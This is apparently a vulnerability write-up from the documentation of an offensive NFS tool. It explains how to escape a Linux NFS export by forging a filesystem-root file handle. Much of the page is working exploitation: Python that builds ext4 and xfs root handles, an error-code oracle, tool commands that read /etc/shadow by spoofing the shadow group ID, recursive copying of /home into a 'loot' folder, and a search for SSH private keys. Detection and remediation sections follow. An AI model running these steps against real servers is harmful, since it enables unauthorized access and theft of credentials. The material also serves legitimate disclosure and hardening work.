Skip to content

F-2.1: Export Escape via Filesystem Root Handle

Classification

  • Severity: Critical
  • CVSS Vector: Network / Low Complexity / No Auth Required
  • Affected Versions: NFSv2, NFSv3, and NFSv4 on Linux
  • Configuration: no_subtree_check (default on Linux since kernel 2.6.25)
  • Prerequisite: Export is not the root of its filesystem, server runs Linux
  • RFC Basis: RFC 1094 §2.3.3, RFC 1813 §3.3.3, RFC 2623 §2.6

Summary

When subtree_check is disabled (the default on Linux), the NFS server only verifies that a requested file handle belongs to the correct filesystem, not that it resides within the exported directory tree. An attacker who can mount any export on a filesystem can craft file handles to access any file on the same filesystem, including system files like /etc/shadow, regardless of what directory was originally exported.

This is the single most impactful NFS finding — it converts any NFS export into full filesystem access.

RFC rationale

Why the protocol allows this

File handles are opaque, server-defined tokens (RFC 1094 §2.3.3):

"The file handle can contain whatever information the server needs to distinguish an individual file."

The RFC does NOT require the server to validate that a handle falls within the exported subtree. The only mount-boundary protection is for LOOKUP:

"A server will not allow a LOOKUP operation to cross a mountpoint." — RFC 1813 §3.3.3

But this says nothing about constructed handles pointing to inodes outside the export on the SAME filesystem. The server checks that the handle's filesystem ID matches an exported filesystem — not that the inode is within the export path.

File handles are bearer tokens — possession grants access (RFC 2623 §2.6):

"An attacker can circumvent the MOUNT server's access control to gain access to a file system that the attacker is not authorized for. The circumvention is accomplished by either stealing a file handle (usually by snooping the network traffic between a legitimate client and server) or guessing a file handle."

The export escape is a special case of "guessing a file handle" — the root inode number is deterministic per filesystem type, making the guess trivial.

No handle MAC or signing — Neither RFC 1094 nor RFC 1813 requires cryptographic protection on handles. Only Windows NFS adds optional HMAC (see F-2.3).

Handles never expire (RFC 1094 Appendix A):

"The mount list information is not critical for the correct functioning of either the client or the server. It is intended for advisory use only."

Once constructed, the escape handle works indefinitely.

Why subtree_check is disabled by default

From man 5 exports:

"subtree checking ... can cause problems when a file is renamed while a client has it open. It is also rather confusing for many people."

Linux disables it by default for reliability, creating the security gap. When enabled, the server walks the directory tree from each requested inode up to the export root on every operation — expensive and causes ESTALE errors when files are renamed or moved.

Technical detail

Linux knfsd file handle structure

NFS file handles on Linux follow the knfsd_fh format:

struct knfsd_fh {
    uint8_t  fh_version;       // always 1 for knfsd
    uint8_t  fh_auth_type;     // always 0
    uint8_t  fh_fsid_type;     // filesystem ID encoding (0-7)
    uint8_t  fh_fileid_type;   // file ID encoding (see table below)
    uint8_t  fh_fsid[...];     // filesystem identifier (variable length)
    uint8_t  fh_fileid[...];   // inode + generation number
};

The first four bytes are the header. fh_fsid_type determines how the filesystem is identified, and fh_fileid_type determines how the file within that filesystem is identified.

fsid_type encodings (bytes 2)

The fh_fsid_type byte determines the fsid format and its length:

fsid_type Length Encoding Description
0 8 bytes dev major:minor + export inode Most common (ext4 default)
1 4 bytes dev number only Compact device ID
2 12 bytes dev + UUID prefix Device + partial UUID
3 8 bytes dev:minor pair (alt) Alternative device encoding
4 8 bytes dev + export UUID Device + export identifier
5 8 bytes UUID prefix (8 bytes) Filesystem UUID truncated
6 16 bytes Full 16-byte UUID XFS and other UUID-native FS
7 24 bytes UUID + inode + generation Extended UUID-based (XFS)

The fsid uniquely identifies which filesystem the handle belongs to. The server validates that the fsid in a handle matches an exported filesystem. This is the only validation when subtree_check is disabled.

fileid_type encodings (byte 3)

The fh_fileid_type byte identifies the file within the filesystem:

fileid_type Filesystem Meaning
0 All Filesystem root handle
1 ext4 Directory (inode + gen)
2 ext4 File (inode + gen + parent inode + parent gen)
0x4d BTRFS Subvolume file/dir (subvol_id + inode + gen)
0x4e BTRFS Subvolume dir with parent
0x4f BTRFS Subvolume root
0x51 UDF File/directory
0x52 UDF Directory with parent
0x61 NILFS2 File/directory
0x62 NILFS2 Directory with parent
0x71 FAT File/directory
0x72 FAT Directory with parent
0x81 ext4 64-bit inode variant
0x97 Lustre File/directory
0xfe kernfs Pseudo-filesystem
0xff — Invalid/reserved

Root inode numbers by filesystem

The key insight: the filesystem root directory always has a known, deterministic inode number:

Filesystem Root Inode Generation Escape Complexity
ext4 2 Usually 0 Trivial — deterministic
xfs 128 (or 64 on older) Usually 0 Trivial — deterministic
BTRFS 256 (subvolume root) 0 Trivial — plus cross-subvolume access
ZFS Varies per dataset Varies High — per-dataset isolation, needs brute-force
UFS (FreeBSD) 2 arc4random Infeasible — 32-bit random generation

Escape handle construction algorithm

This is the algorithm implemented in nfswolf:

1. Mount export → receive export_fh
2. READDIRPLUS(export_fh) → get child handles, detect fileid_type → identify filesystem
3. Check: if export's inode is already the root (inode 2 or 128) → abort (already at root)
4. Extract fsid_type from export_fh[2], look up fsid_len
5. Copy fsid bytes from export_fh

For ext4/xfs:
    6a. Set fileid_type = 0x02 (file type, not root type — root type 0 has different semantics)
    6b. Set fileid = [inode=2, gen=0, parent_inode=2, parent_gen=0]  (ext4)
       OR fileid = [inode=128, gen=0, parent_inode=128, parent_gen=0]  (xfs)
    6c. Try both if filesystem type is unknown

For BTRFS:
    6a. Set fileid_type = 0x4d (BTRFS subvolume)
    6b. Iterate subvolume IDs (256, 257, 258, ...) — each is a separate subvolume
    6c. Construct: [subvol_objectid=256, subvol_id=0, inode=256+i, gen=0]

7. Send READDIRPLUS(constructed_handle) → if it returns entries, escape succeeded
8. CONFIRM: Compare child count of escape listing vs export listing — they should differ
   (escape has more entries since it's the whole filesystem root)

The ext4 escape handle (byte-level)

Given an export handle starting with:

01 00 00 02              # version=1, auth=0, fsid_type=0, fileid_type=2
xx xx xx xx  xx xx xx xx # fsid (8 bytes: dev major:minor + export inode)

The escape handle replaces everything after fsid:

01 00 00 02              # version=1, auth=0, fsid_type=0, fileid_type=2
[  same 8 fsid bytes  ] # keep filesystem identity
02 00 00 00              # inode = 2 (ext4 root), little-endian
00 00 00 00              # generation = 0
02 00 00 00              # parent inode = 2 (root's parent is itself)
00 00 00 00              # parent generation = 0

Escape confirmation technique

A successful escape is confirmed by comparing READDIRPLUS results:

  1. READDIRPLUS on the export handle returns files in /srv/share/ (e.g., 15 entries)
  2. READDIRPLUS on the escape handle returns files in / (e.g., 25 entries: bin, etc, home, var, ...)
  3. If the escape listing has significantly more entries and different names → confirmed

For NFSv4, the comparison uses the directory entry set difference:

# If the escape directory has >3 more entries than the export directory,
# and contains system directories not in the export → escape confirmed
if abs(len(escape_dir) - len(export_dir)) > 3:
    return True  # confirmed escape

The handle oracle (NFS3ERR_BADHANDLE vs NFS3ERR_STALE)

When a constructed handle is rejected, the error code reveals why (RFC 1813 §2.6):

  • NFS3ERR_BADHANDLE (10001): "The file handle failed internal consistency checks" — the handle FORMAT is wrong. Try a different fsid_type or fileid_type encoding.

  • NFS3ERR_STALE (70): "The file handle refers to a file or directory that no longer exists" — the handle FORMAT is correct, but the inode/generation doesn't match an existing file. The fsid is correct. Try different inode numbers or generation values.

This oracle is invaluable: STALE tells the attacker they've guessed the correct handle structure and only need to vary the inode/generation fields.

Attack flow

1. Mount legitimate export (e.g., /srv/share)
2. READDIRPLUS → detect filesystem type from child handle fileid_types
3. Extract fsid from the export's file handle
4. Check if export inode == root inode → if so, already have full access
5. Construct handle: same fsid, root inode (2 for ext4, 128 for xfs)
6. READDIRPLUS on constructed handle → filesystem root listing
7. Confirm escape via child count comparison
8. LOOKUP etc → LOOKUP shadow → READ shadow_fh with GID 42 (Debian) or GID 15 (SUSE)
9. Full filesystem access achieved

Exploitation

Automated: nfswolf

# Analyze — automatically attempts escape on all exports
nfswolf analyze target

# Step 1: get the root handle for the underlying filesystem
HANDLE=$(nfswolf escape target:/srv --json | jq -r .root_handle)

# Step 2: read /etc/shadow with the Debian shadow GID (shell on the handle)
nfswolf --gid 42 shell target --handle "$HANDLE"
nfs> cat /etc/shadow

# Step 2 (alt): mount the constructed handle locally
nfswolf mount target /mnt/escaped --handle "$HANDLE"

# Step 2 (alt): recursively pull files off the escaped filesystem
nfswolf shell target --handle "$HANDLE"
nfs> get -r /home ./loot/home

The /etc/shadow trick (Debian/SUSE)

Even with root_squash enabled (UID 0 blocked), /etc/shadow is readable on Debian-based systems:

# On Debian/Ubuntu:
ls -la /etc/shadow
# -rw-r----- 1 root shadow 1421 Feb 19 17:48 /etc/shadow
#                       ^^^^^^
# Group: shadow (GID 42) — NOT GID 0!

Since root_squash only blocks UID 0 and GID 0, an attacker can read /etc/shadow by claiming GID 42 (see F-1.3: Auxiliary Group Injection):

# Set credential to GID 42 (shadow group on Debian)
credential = AUTH_SYS(0, "host", 65534, 42, [42])
# Now read /etc/shadow through the escaped handle
data = await client.read(shadow_fh, 0, 65536)

Distribution-specific shadow GIDs:

Distribution /etc/shadow Group GID
Debian/Ubuntu shadow 42
SUSE/openSUSE shadow 15
RHEL/Fedora root 0 (blocked by root_squash)
Arch Linux root 0 (blocked by root_squash)

Manual: constructing the escape handle (Python)

import struct
import binascii

# From the export's file handle (obtained via MOUNT)
export_fh = bytearray.fromhex("0100000265ac0a000000000019548b48d914438cbec47a14f9b26726")

# Parse header
fh_version = export_fh[0]       # 0x01 (must be 1 for Linux knfsd)
fh_auth = export_fh[1]          # 0x00
fh_fsid_type = export_fh[2]     # 0x00 = dev major:minor (8-byte fsid)
fh_fileid_type = export_fh[3]   # current file type

# Look up fsid length
fsid_lens = {0: 8, 1: 4, 2: 12, 3: 8, 4: 8, 5: 8, 6: 16, 7: 24}
fsid_len = fsid_lens[fh_fsid_type]

# Extract fsid (filesystem identity)
fsid = export_fh[4:4 + fsid_len]

# Construct ext4 root handle
# fileid for root: inode=2, gen=0, parent_inode=2, parent_gen=0
root_fh = bytearray([0x01, 0x00, fh_fsid_type, 0x02])  # version, auth, fsid_type, fileid_type=2
root_fh.extend(fsid)
root_fh.extend(struct.pack("<I", 2))    # inode 2 (ext4 root)
root_fh.extend(struct.pack("<I", 0))    # generation 0
root_fh.extend(struct.pack("<I", 2))    # parent inode 2
root_fh.extend(struct.pack("<I", 0))    # parent generation 0

# If ext4 fails, try xfs (inode 128)
xfs_root_fh = bytearray([0x01, 0x00, fh_fsid_type, 0x02])
xfs_root_fh.extend(fsid)
xfs_root_fh.extend(struct.pack("<I", 128))  # inode 128 (xfs root)
xfs_root_fh.extend(struct.pack("<I", 0))
xfs_root_fh.extend(struct.pack("<I", 128))
xfs_root_fh.extend(struct.pack("<I", 0))

# Use READDIRPLUS to verify escape
# NFS3_OK → escaped
# NFS3ERR_STALE → correct format, wrong inode/gen (try other values)
# NFS3ERR_BADHANDLE → wrong format (try different fsid_type)

Mounting the escaped filesystem with FUSE

# Get the root file handle from nfswolf analyze output
ROOT_FH="0100000265ac0a00..."

# Mount the entire filesystem using the escaped handle
nfswolf mount target /mnt/escaped --handle "$ROOT_FH"

# Now browse the entire filesystem
ls /mnt/escaped/etc/
cat /mnt/escaped/etc/shadow
find /mnt/escaped/home -name "id_rsa" -type f

Filesystem-specific behavior

Filesystem Root Inode fileid_type Escape Complexity Notes
ext4 2 0x02 Trivial Generation number usually 0; most common
xfs 128 (or 64) 0x02 Trivial fsid_type often 6 or 7 (UUID-based)
BTRFS 256 0x4d Trivial Cross-subvolume access; see F-2.4
ZFS Varies Varies High Per-dataset isolation; handle brute-force needed
FreeBSD UFS 2 — Infeasible 32-bit arc4random generation number

BTRFS cross-subvolume access

On BTRFS, escape enables access to ALL subvolumes and snapshots (see F-2.4):

btrfs subvolume list /
# ID 256 gen 100 top level 5 path @
# ID 257 gen 99  top level 5 path @home
# ID 258 gen 50  top level 5 path @snapshots/daily-2024-01-01

Each subvolume has a predictable root inode, enabling access to snapshot data that may contain older versions of sensitive files.

Finding Relationship
F-2.4: BTRFS Subvolume Escape BTRFS-specific extension of export escape
F-2.6: Bind Mount Escape Bind mounts share the same fsid — escape works through them
F-1.3: Auxiliary Group Injection Shadow GID trick to read /etc/shadow after escape
F-1.1: UID/GID Spoofing Credential forgery to access files found via escape
F-5.2: READDIRPLUS Harvesting READDIRPLUS harvests handles for all files at escape root
F-2.2: File Handle Guessing Generalized version; escape is a special case with known inode
F-7.6: No Audit Logging Escape operations leave no server-side logs

Impact

  • Full filesystem read access — not just the exported directory
  • /etc/shadow extraction on Debian/SUSE systems (GID 42/15 trick)
  • SSH key theft from user home directories (/home/*/.ssh/id_rsa)
  • Web shell upload via /var/www/ (if combined with write access)
  • Log access via /var/log/ for intelligence gathering
  • Configuration exposure: database credentials, API keys, certificates
  • Snapshot data exposure on BTRFS (potentially deleted/old sensitive data)
  • Combined with F-4.1: If no_root_squash is also set, escape + write = full server compromise

Detection

  • No server-side logs differentiate escaped access from legitimate access (F-7.6)
  • Network-level detection would require tracking which file handles correspond to which exported directories (impractical at scale)
  • File integrity monitoring (AIDE, Tripwire) on the server could detect unauthorized modifications
  • eBPF/bpftrace tracing of knfsd could log inode access outside export boundaries (custom, high overhead)

Remediation

  1. Make each export the root of its own filesystem (most effective):

    lvcreate -L 10G -n nfs_share vg0
    mkfs.ext4 /dev/vg0/nfs_share
    mount /dev/vg0/nfs_share /srv/share
    # Now /srv/share IS the filesystem root → escape impossible
    

  2. Enable subtree_check (if a separate filesystem isn't possible):

    /srv/share  *(rw,sync,subtree_check)
    
    Warning: Causes ESTALE errors when files are renamed while open.

  3. Use bind mounts cautiously — they do NOT provide isolation (see F-2.6). The underlying filesystem is still accessible because bind mounts share the same fsid.

  4. On BTRFS, always enable subtree_check if other subvolumes contain sensitive data.

  5. Restrict shadow group access — set /etc/shadow to root:root ownership (as RHEL does) instead of root:shadow.

  6. Use Kerberos (sec=krb5) — while it doesn't prevent escape, it prevents the UID/GID spoofing needed to read files after escaping (assuming the attacker doesn't have a valid Kerberos ticket for a privileged user).

nfswolf implementation

The escape logic is in src/engine/file_handle.rs: - FileHandleAnalyzer::construct_escape_handle() — auto-detect FS type and construct root handle - FileHandleAnalyzer::construct_handle_for_inode() — generic primitive for arbitrary inode targeting - FileHandleAnalyzer::construct_btrfs_subvol_handles() — BTRFS subvolume enumeration - FileHandleAnalyzer::fingerprint_fs() — filesystem detection from fileid_type - FileHandleAnalyzer::fingerprint_os() — OS detection from handle format